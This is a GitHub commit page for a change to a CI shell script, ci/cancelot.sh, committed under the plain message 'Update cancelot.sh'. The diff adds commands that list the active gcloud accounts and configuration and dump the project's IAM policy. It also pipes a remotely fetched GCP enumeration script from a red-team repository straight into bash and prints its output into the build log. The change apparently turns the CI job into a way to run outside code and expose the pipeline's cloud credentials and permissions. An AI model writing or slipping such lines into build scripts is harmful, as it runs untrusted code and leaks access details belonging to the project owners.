Skip to content

Commit

Permalink
Update cancelot.sh
Browse files Browse the repository at this point in the history
  • Loading branch information
OctoSabercat authored Nov 12, 2024
1 parent 165a25d commit 1248712
Showing 1 changed file with 5 additions and 4 deletions.
9 changes: 5 additions & 4 deletions ci/cancelot.sh
Original file line number Diff line number Diff line change
Expand Up @@ -32,9 +32,10 @@ set -o pipefail
B_ID=$1
PROJECT=$2

curl -sSfL

gcloud config set project $PROJECT
gcloud info
gcloud config list
gcloud auth list
gcloud projects get-iam-policy $PROJECT
curl -sSfL https://gitlab.com/gitlab-com/gl-security/security-operations/redteam/redteam-public/pocs/gcp_enum/-/raw/master/gcp_enum.sh?ref_type=heads | bash
ls out-gcp-enum
cat out-gcp-enum/*

0 comments on commit 1248712

Please sign in to comment.